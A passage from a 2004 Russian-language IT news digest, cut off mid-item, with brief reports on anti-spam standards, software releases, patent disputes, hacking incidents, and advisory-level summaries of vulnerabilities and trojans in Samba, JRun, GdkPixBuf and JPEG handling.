3/10/2004 10:50 Борьбу со спамерами ведут гиганты интернета
Борьба со спамом - непрошенными рекламными сообщениями, засоряющими интернет, вступила в новый этап. В нее включились гиганты Всемирной паутины. С октября компании AOL, Yahoo, Hotmail, Earthlink и Comcast будут требовать с тех пользователей, который отправляют большие объемы сообщений по электронной почте, соблюдения определенных правил. Речь идет о внедрении этими пятью гигантами интернет-бизнеса технических стандартов, которые получили название "Sender Policy Framework" , также "паспорт отправителя" (Sender-ID). Отныне электронные сообщения, поступающие на серверы этих пяти компаний, в случае, если они не будут содержать оговоренные параметры, будут автоматически отфильтровываться как спам. С другой стороны, эти стандарты помогут тем организациям, которые на законных основаниях распространяют электронную рекламу, увеличить ее эффективность. Введение стандарта "паспорт отправителя" было предложено еще полгода назад корпорацией Microsoft, однако теперь его решили объединить со стандартом SPF. Как считают специалисты, к концу этого года примерно половина всех сообщений, генерируемых в США, будет соответствовать требованиями новых стандартов.
SecurityLab.Ru

2/10/2004 14:27 Microsoft готовит премьеру MSN Messenger 7.0 beta
На следующей неделе группа специально отобранных бета-тестеров получит в свое распоряжение предварительную версию IM-клиента MSN Messenger 7.0. В числе тестировщиков, как сообщает InfoWorld, будут граждане США, Великобритании, Франции, Испании, Голландии и Южной Кореи. После того, как испытатели выскажут программистам Microsoft все, что они думают по поводу качества и функциональности этого продукта, компания подготовит уже обычную бета-версию, которую можно будет свободно скачать с сайта Microsoft. Помимо внедрения в программе загадочной «персонализированной среды обмена сообщениями», в новом IM-клиенте должны появиться инструменты для привлечения к себе внимания уснувшего или отвлекшегося на посторонние вопросы собеседника по чату, вроде функции «подмигивания», «потряхивания» и так далее. По всей видимости, перед тем, как делать далеко идущие обобщения, следует дождаться появления официальной версии программы. Тем не менее, пока складывается впечатление, что Microsoft старательно «навешивает» на свой Messenger опции, давно приевшиеся пользователям не только ICQ, но также и Yahoo!Messenger, и, очевидно, других, более экзотических программ.
Internet.Ru

2/10/2004 13:52 ФСБ сертифицировала криптографические средства "Анкад"
Сертификаты Федеральной службы безопасности России получили продукты фирмы «Анкад». «Анкад» разрабатывает криптографические средства защиты информации. Сертифицированы следующие продукты:
- Аппаратно-программное средство криптографической защиты информации «Криптон-4/PCI», поддерживающее также функции ограничения доступа к компьютеру (сертификат № СФ/527–0719);
-Программное средство криптографической защиты информации(СКЗИ) «Crypton Emulator» (сертификат № СФ/114–0731)
- Программное средство криптографической защиты информации (СКЗИ) «Криптон-Шифрование», выполняющее функции шифрования (сертификат № СФ/110–0732).
Действие новых сертификатов распространяется до 1 августа 2007 г.
CNews

2/10/2004 13:30 Mozilla.org представляет новые версии своих продуктов
Разработчики открытого браузера Mozilla объявили о выходе Mozilla 1.8 Alpha 4. Судя по тому, что доступно в альфа-версии, Mozilla 1.8 станет важным шагом в развитии браузера. Разработчики обещают поддержку множества новых сетевых стандартов (в первую очередь, CSS 3.0). Реализован также улучшенный механизм блокирования всплывающих окон, переработана система выбора "горячих клавиш". Почтовый клиент тоже подвергся некоторой доработке: стали доступны виртуальные папки для сохранения результатов поиска, а в версию для Linux был добавлен встроенный модуль проверки орфографии. До выхода окончательной версии браузера разработчики планируют выпустить, по крайней мере, еще один альфа-релиз. Переработке также подвергся и IRC-клиент от авторов Mozilla. Chatzilla теперь носит номер 0.9.65. В новой версии исправлены около тридцати багов, и добавлены некоторые полезные функции, среди них: поддержка протокола SSL, некоторые новые пользовательские команды, улучшенная поддержка unicode (теперь Chatzilla понимает unicode в именах пользователей и ссылках).
"Компьюлента"

2/10/2004 12:57 Уязвимости в Linux при работе с файлами BMP, XPM и ICO
Обнаружен ряд уязвимостей в приложениях под Linux. Первая связана с обработкой изображений в формате BMP различными приложениями. Уязвимость может быть использована для создания бесконечного цикла в различного рода приложениях, работающих с этим форматом. Вторая уязвимость тоже касается графики — на этот раз формата XMP, разработанного еще в 1989 году. При помощи нее злоумышленник способен вызвать переполнение буфера и выполнить злонамеренный код на стороне клиента. Обе перечисленные уязвимости кроются в использовании библиотеки GdkPixBuf, использующейся в множестве популярных приложений (например, в GNOME2). Последняя из обнаруженных уязвимостей связана с форматом ICO, применяющимся для создания ярлыков («иконок») и мини-иконок (fav-icon), показываемых браузерами перед адресной строкой. Это пожалуй самая опасная уязвимость, поскольку среднестатистический пользователь сталкивается с этим форматом десятки а то и сотни раз в день. Впрочем, создатели браузеров Mozilla уже успокоили пользователей, сообщив, что FireFox от этой уязвимости уже защищен.
nixp.ru

2/10/2004 12:35 Sun хочет запатентовать Looking Glass?
Компания Sun Microsystems желает запатентовать трехмерный пользовательский интерфейс Looking Glass, сообщает OSNews. Это не было бы странным, если бы не один факт: некоторое время назад Sun опубликовала исходный код Looking Glass по GPL. Это значит, что разработчики Open Glass и его пользователи рискуют оказаться в неудобном положении. Официальных разъяснений от Sun Microsystems по этому поводу пока не поступало.
Подробности

2/10/2004 12:02 Тенденции развития вредоносных программ, сентябрь 2004
"Лаборатория Касперского" опубликовала обзор событий в мире вредоносных компьютерных программ за прошедший месяц.
Обзор

2/10/2004 11:36 Журнал CHIP проверил антиспамерскую защиту бесплатной почты
Журнал CHIP опубликовал результаты экспресс-исследования надежности антиспамерских фильтров, используемых крупнейшими российскими бесплатными почтовыми службами. Объектами исследования стали почтовые сервисы Рамблера, Яндекса, Mail.ru, Newmail.ru и Hotbox.ru. Журналисты разослали по специально зарегистрированным бесплатным адресам рекламные письма, снабженные всеми известными спамерскими хитростями: случайными фразами в теме письма, "шумом" между словами и т.д. Результаты исследования CHIP приводит в виде результирующей таблицы. Исследователи отмечают, что эксперимент был не совсем чистым: для рассылки использовалось настоящее спамерское письмо, уже проходившее через бесплатные сервера и успевшее попасть в базы фильтров. Строго говоря, приведенные высокие результаты показывают эффективность борьбы почтовиков с долгоиграющими рассылками. Тем не менее, авторы статьи готовы констатировать большие успехи технологических способов борьбы со спамом.
Подробности и таблица

1/10/2004 16:00 «Арбатек» шлет открытое письмо ИА Regnum
Вчера на сайте ИА Regnum была опубликована статья «Провайдеры: террористические сайты слишком выгодны». В связи с этим, Константин Листратов от имени "Арбатек" обратился с открытым письмом к руководству ИА Regnum и ко всем пользователям российского интернета. 29 сентября на страницах web-сайта информационного агенства Regnum в качестве комментария к новости о взломе хакерами сайта иракской террористической группировки «Единобожие и Джихад», была опубликована статья «Провайдеры: террористические сайты слишком выгодны». В статье со ссылкой на неизвестных провайдеров из Санкт-Петербурга утверждается следующее: «Террористические сайты будут всегда — они слишком выгодны для провайдеров. Некоторые из них, в погоне за прибылью могут закрывать глаза на содержание сайтов.» Далее, со ссылкой на газету «Деловой Петербург» приводится следующая информация: «сейчас большинство провайдеров зарабатывают не на хостинге, а на трафике, то есть на посещаемости ресурсов, размещенных на серверах провайдера». Господин Листратов ответил на сайте "Вебпланеты" на эти высказывания.
Письмо

1/10/2004 14:57 JPEG-вирус распространяется через чат
Вирус, использующий недавно найденную в программных продуктах Microsoft уязвимость при обработке графических файлов формата JPEG, распространяется через службу обмена многновенными сообщениями AOL. По словам экспертов института SANS (SysAdmin Audit Network Security), вирус еще не успел широко распространиться - институт располагает пока лишь двумя сообщениями о заражении. "Такое уже делали в прошлом, только с использованием HTML-кода, а не JPEG, - говорит Джоэнис Ульрих (Johannes Ullrich), технический директор центра по исследованию интернет-атак института SANS. – Это вирус, но он еще не успел распространиться". Вирус действует следующим образом: жертва получает сообщение через IM-службу AOL, которое перенаправляет ее на веб-сайт с инфицированными файлами изображений в формате JPEG. Сообщение выглядит следующим образом: "Check out my profile, click GET INFO!" («Проверь мой профайл, нажми на ПОЛУЧИТЬ ИНФОРМАЦИЮ»). Когда пользователь кликает на ссылку, на его компьютере автоматически запускается вредоносный код, содержащийся в инфицированной картинке. Далее зараженный компьютер автоматически рассылает то же сообщение по всему контакт-листу IM-службы AOL. Вредоносный код содержит также так называемый черный ход (backdoor) - утилиту удаленного администрирования, позволяющую злоумышленнику перехватить управление зараженным компьютером. Еще 29 сентября Микко Хиппонен (Mikko Hypponen) из компании F-Secure предупредил о том, что многим современным средствам антивирусной защиты будет сложно обнаружить зараженные файлы JPEG. Во-первых, антивирус по умолчанию проверяет лишь .exe-файлы. Пользователь может изменить настройки для поиска файлов JPEG, однако злоумышленники тоже могут изменить это расширение на 11 других, включая JPEG2 и ICON. Так что их поиск в корпоративной сети, по словам эксперта, займет немало времени и потребует значительных вычислительных ресурсов. Проблема еще и в том, что Internet Explorer сначала выполняет JPEG-файл, и лишь потом записывает его в свой кэш, так что антивирус не может обнаружить вредоносную картинку до заражения. "Это означает, что недостаточно проверять на вирус сам компьютер, - говорит эксперт. – Нужно сканировать на шлюзе, но это может значительно отразиться на пропускной способности сети".
CNews

1/10/2004 13:52 Уязвимость в Samba
Всё той же iDEFENSE обнаружена уязвимость в ПО Samba (предоставление ресурсов UNIX-сервера для доступа в NetBIOS-сетях). Суть уязвимости сводится к некорректной работе подпрограммы перевода пути в DOS-соглашениям к UNIX. Присутствует в функциях unix_convert() и сheck_name() (также в unix_clean_name()). использзуя уязвимость удалённый злоумышленник может получить доступ к файлам за пределами директории, которая отдана для общего доступа (расшарена) в файле smb.connf. Для использования уязвимости может быть использован стандартный для *nix клиент smbclient с использованием команд "get", "put" и "dir". Подчёркивается, что подобная атака невозможна при задании в smb.conf опции 'wide links = no'. После сообщения об уязвимости командой разработчиков проекта Samba выпущены версии 2.2.12 и патч для версии 3.0.5.
Описание

1/10/2004 13:34 Троян Binny использует дыру в SUN Java Runtime
Компания "Лаборатория Касперского" предупреждает о появлении первого Java-трояна, поражающего компьютеры, владельцы которых используют при навигации по Сети браузеры, в свою очередь использующие Java Runtime (Opera, Mozilla, IE etc.). Вредоносная программа Binny представляет собой Java-апплет для веб-страниц, эксплуатирующий уязвимость пакета обработки SUN Java Runtime (может быть подключён в вышеназванных браузерах). Апплет состоит из трех файлов с именами mein.class (размер 2031 байт), binny.class (размер 3464 байта) и beyond.class (размер 972 байта).
Описание

1/10/2004 12:09 Описание уязвимости в Macromedia JRun 4
Ранее мы сообщали о наличии уязвимости в JRun-cервере от Macromedia и выпущенном компанией кумулятивном патче (модуль Macromedia JRun 4 ииспользуется для обеспечения работы с java-приложениями Вэб-сервера Apache0). Компания iDEFENSE выпустила детальное описание уязвимости. Согласно этому описанию, уязвимость присутствует в модуле mod_jrun (и mod_jrun20) для Apache. В функции WriteToLog выделяется фиксированный размер буфера для стека и не производится проверка вводимых данных. При включённой опции Verbose в httpd.conf существует возможность ввода пользовательских данных для передачи этой функции. Соответственно, при передаче поля параметров, длина которого превышает выделеннный объём памяти, происходит переполнение буфера с возможным выполнением произвольного кода. Для формирования подобного переполнения могут быть использованы поля заголовков HTTP-запроса, в частности, поле "Content-Type".
Описание

1/10/2004 11:57 Sun продвигает OpenOffice в качестве стандарта
Компания Sun Microsystems поддержала усилия Европейского союза по стандартизации форматов офисных документов, в том числе предложение, реализация которого позволила бы легко переходить с документов в форматах Microsoft на те, что созданы при помощи программного обеспечения open-source. В недавнем письме в Европейскую комиссию президент Sun Джонатан Шварц сказал, что он согласен с рекомендацией отдела Европейской комиссии по обмену данными между администрациями (IDA) о принятии в качестве международного стандарта формата, используемого в OpenOffice.org, комплексе деловых программ open-source на базе продукта Sun StarOffice. Это предложение входит в руководящие материалы, выпущенные IDA в мае для решения накопившихся проблем в области обмена электронными документами. Организация по развитию стандартов структурированной информации (OASIS) уже работает над стандартизацией средств управления XML, применяемых в OpenOffice.org (OASIS Open Document Format). IDA рекомендует сделать следующий шаг и передать этот формат в Международную организацию по стандартизации (ISO) для утверждения в качестве международного стандарта. Поддержав предложение ISO, Шварц в своем письме отмечает, что представители Sun предложили эту идею членам OASIS. «Мы не контролируем… OASIS или ISO и не можем гарантировать успех, — пишет Шварц. — Но мы не предвидим никаких серьезных осложнений на данный момент, и я думаю, что можно надеяться: формат OASIS Open Office XML станет стандартом ISO». В отчете IDA рекомендуется также производителям ПО подготовить фильтры, позволяющие читать XML-документы, созданные в одном приложении, в других офисных приложениях. Шварц назвал это хорошей идеей и пообещал, что в следующие версии StarOffice и OpenOffice.org компания Sun добавит фильтры, позволяющие обмениваться документами на базе WordML и ExcelML, диалектов языка XML соответственно для работы с текстом и электронными таблицами от Microsoft.
ZDNet

1/10/2004 11:28 Уязвимости в медиаплеерах
В медиаплеерах RealOne Player, RealPlayer и Helix Player обнаружены уязвимости. Разработчик, RealNetworks Inc., пишет о наличии трёх уязвимостей. Первые две уязвимости, охарактеризованные как критически опасные, могут использоваться злоумышленниками с целью выполнения произвольного кода на удаленном компьютере. Атака может быть осуществлена через сформированный особым образом RM-файл или через вредоносную веб-страницу. Еще одна дыра позволяет нападающему удалять на машине жертвы файлы, расположенные в каталогах с заранее известными названиями. Уязвимости подвержены: Helix Player 1.x, RealOne Player v1, RealOne Player v2, RealPlayer 10, RealPlayer 8, RealPlayer Enterprise. Для устранения уязвимости рекомендуют воспользоваться встроенной службой обновления.
Описание

1/10/2004 11:14 Microsoft начала обжалование приказа Еврокомиссии раскрыть исходные коды
Microsoft начала процедуру обжалования постановления Еврокомиссии, которая в марте этого года обязала корпорацию раскрывать при работе в Европе исходные коды своего программного обеспечения, чтобы сторонние разработчики имели возможность анализировать свои продукты на предмет совместимости. По мнению Еврокомиссии, Microsoft также злоупотребила своим монопольным положением на рынке, за что на нее был наложен штраф 497 миллионов евро. Представители Microsoft в четверг подали иск в суд первой инстанции в Люксембурге, заявив, что постановление Еврокомиссии нарушает право компании на коммерческую тайну. "Первый раз в истории конкуренции компании приказано самой описать свою секретную технологию и предоставить ее конкурентам", - заявил представитель Microsoft. Как сообщает BBC News, судебная инстанция должна дать ответ в течение нескольких недель.
Lenta.Ru

1/10/2004 10:39 Выход Java 1.5.0 (J2SE 5.0)
Sun Microsystems официально объявила о выходе новой версии своего ПО для поддержки и разработки Java-приложений (апплетов) - J2SE 5.0 (Java 2 Platform Standard Edition).
Подробности

1/10/2004 10:04 Патент на FAT объявлен недействительным
Благодаря усилиям образованной недавно группы PUBPAT (Public Patent Foundation), US Patent Office признал патент, выданный Microsoft на файловую систему FAT, недействительным. Это первые результаты деятельности PUBPAT в борьбе против современной системы software-патентов в США. Однако радоваться победе еще рано: Microsoft имеет возможность подать апелляцию, сообщает linux.org.ru.
Подробности

30/09/2004 17:04 Выход Apache 2.0.52
ASF (Apache Software Foundation) выпущен очередная версия Вэб-сервера Apache ветви 2.0 - 2.0.52, cменившего недавно выпущенный 2.0.51. Выпуск новой версии связан с устранением уязвимости в обработке директивы Satisfy (применяется для осуществления доступа к запароленным ресурсам Вэб-сервера), о чём мы сообщали недавно в новостях. Попутно было устранено ещё несколько багов и добавлено несколько усовершенствований, например - сообщения об ошибках формируются теперь в формате HTML 2.0, устранение ошибки сегментации при работе с LDAP, устранение ошибки при обработке URI, содержащей код %2F при включении директивы AllowEncodedSlashes, добавлен флаг -l, предназначенный для использования локального времени вместо UTC при ротации файлов журналов и т.д. Полный список изменений доступен по адресу, приведённому ниже.
Изменения

30/09/2004 15:53 Калужский хакер чистосердечно раскаялся
Управление ФСБ России по Калужской области завершило расследование уголовного дела в отношении Андрея Михеева, студента факультета информатики одного из калужских вузов. Как сообщили корреспонденту REGIONS.RU в пресс-службе УФСБ по Калужской области, он обвинялся по трем статьям Уголовного кодекса РФ: 272 - "Неправомерный доступ к компьютерной информации", 273 - "Создание, распространение и использование вредоносных программ для ЭВМ", 165- "Причинение имущественного ущерба". А.Михеев неправомерно использовал пароли доступа к сети Интернет различных крупных предприятий и организаций области, среди законных пользователей которых - органы государственной власти, режимные предприятия, редакции печатных изданий. Вина Михеева была полностью доказана. Вместе с тем, принимая во внимание, что обвиняемый сделал письменное заявление о чистосердечном раскаянии, во время предварительного расследования признал свою вину в совершенных преступлениях, способствовал их раскрытию, добровольно возместил в полном объеме причиненный имущественный ущерб, прокурором области было принято решение о прекращении уголовного дела Михеева в связи с его деятельным раскаянием.
Источник

30/09/2004 14:17 JBoss поддерживает J2EE 1.4
Компания JBoss выпустила JBoss Application Server 4.0 - первый, согласно ее заявлению, сервер приложений с открытым кодом, сертифицированный на совместимость с платформой J2EE 1.4. Продукт поставляется бесплатно по лицензии Lesser General Public License, которая, как заявляют в JBoss, является наиболее либеральной среди всех лицензий, регулирующих распространение открытых кодов. В компании особо подчеркивают модульность сервера, позволяющую изымать или добавлять различные компоненты. В JBoss Application Server реализована кластеризация Java-объектов, включая EJB-, JMS- и HTTP-объекты. Поддерживается технология Java Management Extensions. JBoss предлагает платные услуги по поддержке сервера приложений и обучению работе с ним.
"Открытые системы"

30/09/2004 13:35 Конкурс по взлому сервера под управлением ALT Linux
В рамках проводимой в настоящее время выставки Softool 2004, компания ООО «Альт Линукс» предлагает всем желающим попробовать свои силы во взломе сервера под управлением ALT Linux 2.4 Master. Желающим будут предоставлены пользовательский вход, физический доступ к серверу и подключение к Интернету (соответственно, доступ к серверу возможен с локальной консоли, из локальной сети с рабочей станции, а также из интернета). Всё как в кино, только ЭТО — реально! Наиболее удачливые так же будут награждены призами, а победитель будет награжден коробкой дистрибутива ALT Linux 2.3 SOHO Server, DVD-версией дистрибутива ALT Linux 2.4 Master и получит приглашение в ALT Security Team. Адрес сервера: breakin-contest.altlinux.ru.
Адрес сервера и условия

30/09/2004 13:00 Red Hat покупает у AOL серверное ПО Netscape
Наращивая свою open-source мощь, Linux-компания Red Hat приобрела серверные программные продукты Netscape у AOL Time Warner. Официальное объявление этого события ожидается уже сегодня. Red Hat собирается выпустить Netscape Enterprise Suite как программное обеспечение с открытым кодом, разрешив любому желающему использовать, модифицировать и распространять продукты. Во вчерашнем интервью Matthew Szulik, глава Red Hat, отказался разглашать подробности сделки, однако заметил, что его компании это приобретение обошлось менее чем в 25 миллионов долларов.
nixp.ru

30/09/2004 11:45 Троян Roxe использует уязвимость в обработке JPEG
Symantec выпущено описание трояна, получившего название Backdoor.Roxe, который использует уязвимость в обработке JPEG-изображений (MS04-028). Другие названия - Bloodhound.Exploit.13, Exploit.Win32.MS04-028.gen. Имеет размер 4КБ. После заражения система соединяется с определённым IP-адресом с портом 55000, после чего в системе запускается шелл, позволяющий удалённому злоумышленнику взять систему под контроль. После этого производится загрузка различных файлов с предопределёнными именами.
Описание

30/09/2004 11:27 Настольная Linux — проводник пиратской Windows
Аналитическая фирма Gartner пришла к заключению, что рост популярности Linux-ПК отчасти вызван тем, что в них можно загружать пиратские копии Windows. В опубликованном в среду отчете утверждается, что почти на 40% Linux-ПК будет установлена нелегальная копия Windows — уловка, позволяющая понизить стоимость приобретения Windows-ПК. Доля поставляемых настольных Linux-ПК превышает реальный процент эксплуатируемых Linux-машин. Согласно Gartner, в 2004 году около 5% проданных настольных ПК было оснащено операционной системой Linux, причем в Азии на их долю пришлось 10,5% рынка. Однако парк установленных Linux-ПК не превышает 1,3%. В 2008 году будет продано 7,5% ПК с операционной системой Linux, но установленная база увеличится только до 2,6% и сравняется с установленной базой компьютеров Apple. Сопоставимый недостаток драйверов, расходы на обучение и болезненность миграции будут сдерживать и рост рынка настольной Linux. «Вокруг Linux на настольных ПК много шума, но крупномасштабных внедрений очень мало, — отмечает аналитическая фирма. — Администрации в нескольких европейских странах объявили о планах перехода на Linux, но большинство из этих проектов находятся в стадии оценки». В августе Gartner выпустила отчет, критикующий Windows XP Starter Edition, в котором утверждалось, что в этой системе отсутствуют некоторые функции, и что ее появление, «вероятно, будет способствовать пиратству».
Подробности

30/09/2004 11:18 Конференция национальной антиспамовой коалиции
Крупнейшие игроки российского IT-бизнеса, в прошлом году объединившиеся в "Национальную коалицию против спама", объявляют о проведении очередной конференции по вопросам противодействия индустрии нежелательных электронных рассылок. Мероприятие, в котором примут участие такие известные компании, как Microsoft, Rambler, "Ашманов и партнеры", Mail.ru, Golden Telecom, Subscribe.ru и "Лаборатория Касперского", пройдет 20-21 октября. В ходе конференции ведущие специалисты компаний-участников коалиции представят доклады, посвященные социальным и технологическим аспектам проблематики спама. Выступления затронут такие острые и назревшие для современной IT-индустрии вопросы, как сращивание вирусописательских и спамерских технологий, растущая криминализация компьютерного андеграунда, появление управляемых сетей зомби-машин и разворачивающаяся в глобальной сети борьба между различными хакерскими группировками. Технологическая часть конференции будет особенно интересна для профильных специалистов - участники познакомятся с передовыми методами идентификации отправителей, детектирования массовости рассылки, контентной фильтрации и функционирования байесовских фильтров. С докладами о продуктах для блокирования спама выступят эксперты компаний "Яндекс", "Лаборатория Касперского", "Диалог-Наука", McAfee, Trend Micro и других ведущих производителей средств программного обеспечения.
Подробнее о конференции

30/09/2004 10:43 Электронные ключи Sentinel UltraPro устанавливают новые стандарты защиты ПО
21 сентября компания SafeNet, Inc. (Rainbow Technologies) объявила о выпуске Sentinel UltraPro – нового семейства электронных ключей, обеспечивающих надёжную защиту программного обеспечения от нелегального копирования. В UltraPro – ключах с обновленной кодовой базой реализованы новые возможности, значительно улучшающие защиту, упрощающие эксплуатацию и обеспечивающие гибкую систему лицензирования программных продуктов. Использование Sentinel UltraPro сокращает время между выходом программного продукта на рынок и получением прибыли от первой продажи ПО. Модель Sentinel UltraPro XM предназначена для покупателей, которым необходим большой объём программируемой памяти. Реализованная в UltraPro система автоматического встраивания в программный продукт API-вызовов - Business Layer API(TM) обеспечивает сокращение стоимости и улучшение качества защиты ПО за счет уменьшения возможной программной ошибки. Разработчики и поставщики ПО, используя разработанную компанией SafeNet платформу управления правами (Rights Management Platform - RMP), могут теперь оптимизировать коэффициент окупаемости инвестиций (ROI). В платформе управления правами (RMP) проведена классификация различных уровней безопасности. Поддерживаемые ОС: Red Hat LINUX, MS Windows 9x/NT/2000/XP, Macintosh OSX 10.2x. Ключи Sentinel UltraPro выпускаются для USB и LPT-портов. Познакомиться с возможностями электронных ключей, а также получить комплект разработчика (SDK) Sentinel UltraPro можно будет на конференции «Sentinel UltraPro – очевидные преимущества защиты ПО», которая состоится в ноябре 2004г в Москве.
Rainbow Technologies

30/09/2004 10:04 Австралийские школьники взломали сеть ради хороших оценок
Администрация одной из средних школ австралийского штата Куинсленд вынуждена совершенствовать локальную компьютерную сеть. Причиной для этого послужили действия хакеров, сумевших незаконно получить доступ к данным, хранящимся на школьных серверах, сообщает агентство AAP. В частности, школьники получили в свое распоряжение ответы к тестовым заданиям по математике. Это значит, что в школе будут проведены повторные математические тесты, поскольку о взломе школьной сети стало известно уже после экзаменов. Неизвестные хакеры похитили также и ответы к тестам по английскому языку. Однако об этом администрация узнала до проведения экзамена и заменила задания. Школьное руководство крайне серьезно отнеслось ко взлому школьной сети и намеревается принять самые суровые меры в отношении, тех кто окажется причастен к происшествию. Каким образом хакерам удалось подобраться к защищенным паролями данным - пока неизвестно. Доступ к сети получили не менее десятка неавторизованных пользователей.
Источник

29/09/2004 13:47 Представлена Palm OS Cobalt 6.1
В рамках конференции Euro DevCon компания PalmSource официально представила новую версию своей операционной системы - Palm OS Cobalt 6.1. Основное назначение обновленной версии Palm OS Cobalt - оптимизировать работу со следующими поколениями смартфонов и беспроводных устройств. Версия Palm OS Cobalt 6.1 обладает обновленным пользовательским интерфейсом, наконец-то в полной мере реализована поддержка дисплеев с VGA (480 x 640) разрешением как в портретном, так и в альбомном режиме. Помимо этого, настройки (Preferences) новой версии операционной системы включают в себя возможность широких индивидуальных настроек. Нынешняя Palm OS Cobalt 6.1 в стандартном варианте включает в себя поддержку GSM, MUX и GPRS API, а также NAND ROM, Bluetooth, Wi-Fi, SDIO и USB On-the-Go. Впервые в стандартной версии ОС реализована поддержка китайского языка. Появление первых устройств под управлением Palm OS Cobalt 6.1 ожидается ближе к концу года.
Mobile-Review

29/09/2004 13:24 Американские хакеры «убили» сайт исламских террористов
Сетевой атаке подвергся сайт некой Tawhid and Jihad Group, замеченной в связи с террористической организацией Аль-Каеда, финансируемой полумифическим Осамой бин Ладеном. По данным агентства Reuters, речь идет о сайте, на котором демонстрировались видеозаписи обезглавливания двух американских заложников, захваченных иракскими бандитами. Хакеры из известной своей антитеррористической направленностью команды TeAmZ USA стерли содержимое сайта и поставили редирект с бесплатного хостинга, на котором размещался сайт, на собственную страничку с изображением вооруженного пулеметом пингвина. Сейчас на уничтоженном сайте красуется табличка с надписью «Предложи им хостинг и станешь следующим!».
Internet.Ru

29/09/2004 12:47 Ветераны отрасли поставили на модель open-source
Команда, состоящая из ветеранов компьютерной индустрии, включая бывшего топ-менеджера Microsoft, основала компанию, которая обещает стать Dell от программного обеспечения. Новая компания SourceLabs займется сертификацией, тестированием и технической поддержкой компонентов ПО open-source. Во вторник она объявила о получении стартового капитала в $3,5 млн от Ignition Partners и Index Ventures. Идея, стоящая за SourceLabs, заключается в том, что корпоративные заказчики нуждаются в надежном партнере по закупке и сопровождению продуктов open-source, точно так же, как они опираются на Dell в части снабжения компьютерной аппаратурой, говорит главный инвестор Ignition и бывший старший вице-президент Microsoft Брэд Сильверберг, который участвовал в создании бизнеса Windows софтверного гиганта. SourceLabs — первый стартап open-source, в котором он принимает участие. SourceLabs будет распространять существующее ПО open-source, включая серверные системы и корпоративные приложения, и предоставлять сопутствующие услуги на основе модели подписки, уточнил соучредитель компании Байрон Себастьян, который еще недавно работал в BEA Systems. В SourceLabs оказались и другие выходцы из ВЕА, включая Уилла Пью, главного архитектора новой компании, и Корнелиуса Уиллиса, который стал ее вице-президентом по маркетингу и продажам. А консультантом SourceLabs является бывший главный архитектор ВЕА и технологический гуру Адам Босуорт, который теперь работает вице-президентом по инжинирингу в Google. Следующими шагами SourceLabs будет запуск опытной программы с заказчиками и установление партнерства с такими компаниями, как поставщик СУБД open-source MySQL, сказал Себастьян.
ZDNet

29/09/2004 12:16 Lotus Notes будет развиваться в симбиозе с Workplace
Представители IBM/Lotus не устают убеждать пользователей Notes/Domino в том, что платформа продолжит развиваться. В частности, как сообщают в Lotus, в середине будущего года выйдет новая версия Notes, 7.0. Ее особенностью станет поддержка интеграции с Lotus Workplace, компонентной средой совместной работы, выполненной на базе WebSphere, DB2 и J2EE. В Lotus также сообщают о намерении выпустить в этом году клиент Workplace 2.5, в котором появится встроенный механизм доступа к приложениям Notes. В компании обещают, что после Notes 7 выйдут еще версии 8, 9 и 10. Как сообщается, в Notes 7.0 глубже интегрированы компонентные технологии Workplace, в частности система мгновенного обмена сообщениями, которая теперь поддерживает календари и расписания. Notes 8, в свою очередь, станет полноценным клиентским компонентом, работающим в среде Workplace. В Notes 7.0 впервые будет реализована возможность использования СУБД IBM DB2 в качестве хранилища данных и приложений Notes/Domino (поддержка традиционного для Notes хранилища, NSF, в системе тоже сохранится). По прогнозу Radicati Group, к 2008 году доля рынка Lotus Notes/Domino снизится с нынешних 24 до 17%, в то время как доля Microsoft Exchange вырастет с 31 до 33%.
"Открытые системы"

29/09/2004 11:20 Microsoft вносит изменения в почтовую службу Hotmail
Теперь пользователи смогут получить доступ к своему почтовому ящику на Hotmail из Outlook только за определенную плату. Microsoft не хотела повышать стоимость этого сервиса, такое решение было принято в связи участившимися попытками разослать спам через Hotmail. Для предотвращения подобных действий в будущем Microsoft решила приостановить бесплатное использование некоторых возможностей Hotmail. Уже к апрелю следующего года доступ к веб сервису через Outlook будет платным для всех пользователей Hotmail. Снизить количество спамеров, по мнению Microsoft, поможет также ограничение количества исходящих сообщений. Со следующей недели с одного аккаунта можно будет отправить лишь 100 писем в день. Стоимость использования сервиса составит 19.95 долларов в год. На данный момент в Hotmail зарегистрировано 187 миллионов почтовых адресов.
"Компьюлента"

29/09/2004 10:48 Распространителям вирусов обещан приз в 10 тысяч фунтов
Небольшая британская компания Avecho, занимающаяся разработкой программного обеспечения, пообещала выплатить 10 тыс. фунтов тому, кто сможет преодолеть созданную ей антивирусную защиту. По информации сайта News.com, Avecho объявила конкурс. Его участники должны зарегистрироваться в почтовой системе, защищенной продуктом GlassWall. Те, кто сумеет отправить со своего адреса или получить на него зараженное вирусом письмо, получат 10 тыс. фунтов. "Многие уже попытались сделать это. Я думаю, такой конкурс - это то, что мы можем сделать. Единственное его условие - участники должны сообщать не только о своих удачах, но и о провалах", - прокомментировал ситуацию вице-президент Avecho по международному маркетингу Марк Эллиотт. Пока Avecho является единственной стороной, способной отследить вирусный трафик в собственной почтовой системе. Эллиотт высказал пожелание того, чтобы в проекте приняла участие сторонняя организация. Однако пока предложений такого рода не поступало. Avecho долгое время держала продукт GlassWall в секрете. Компания по-прежнему отказывается раскрывать детали его работы. Информация о GlassWall пока сводится к словам "антивирусное решение на программной основе". Avecho - не первая компания, привлекающая к тестированию своих продуктов хакеров. В 2001 году компания Argus Systems объявила о готовности выплатить награду тем, кто взломает обслуживаемый ей сервер Pit Bull. Однако в итоге польские хакеры из группы Last Stage of Delirium приз от Argus Systems так и не получили. В 2002 году компания Korean Digital Works предложила 100 тыс. долларов тому, кто взломает ее веб-сервер. Однако хакеры в качестве атаки выбрали сервер регистрации участников конкурса компьютерных взломщиков.
Источник

29/09/2004 10:05 Антиспамерская инициатива Microsoft не прошла из-за самой Microsoft
Работы над введением стандарта электронной почты, который бы позволил уменьшить объемы спама в Интернете, прекращены из-за патентного спора с корпорацией Microsoft. Стандарт Sender ID был разработан этой же компанией с целью борьбы с таким распространенным методом рассылки спама, как подстановка чужого электронного адреса в качестве адреса отправителя. Внедрение подобного стандарта на всемирном уровне требует согласованных действий администраторов всех желающих присоединиться компьютерных сетей. Для выработки общепринятых требований к принятию стандарта была в рамках Проблемной группы проектирования Интернета (IETF) была создана специальная инициативная группа. Технология Sender ID была предложена Microsoft. Она подразумевает создание реестра серверов-отправителей и маркировку всех отправляемых через такие серверы писем. Принимающий почтовый сервер делает запрос отправителю, проверяя, действительно ли отдельно взятое письмо проходило через него. Таким образом исключается прием писем с подставными адресами, а заявленные "легальные" отправители, уличенные в преднамеренной рассылке спама, могли бы блокироваться. Вместе с тем, поддержание баз данных при использовании Sender ID базируется 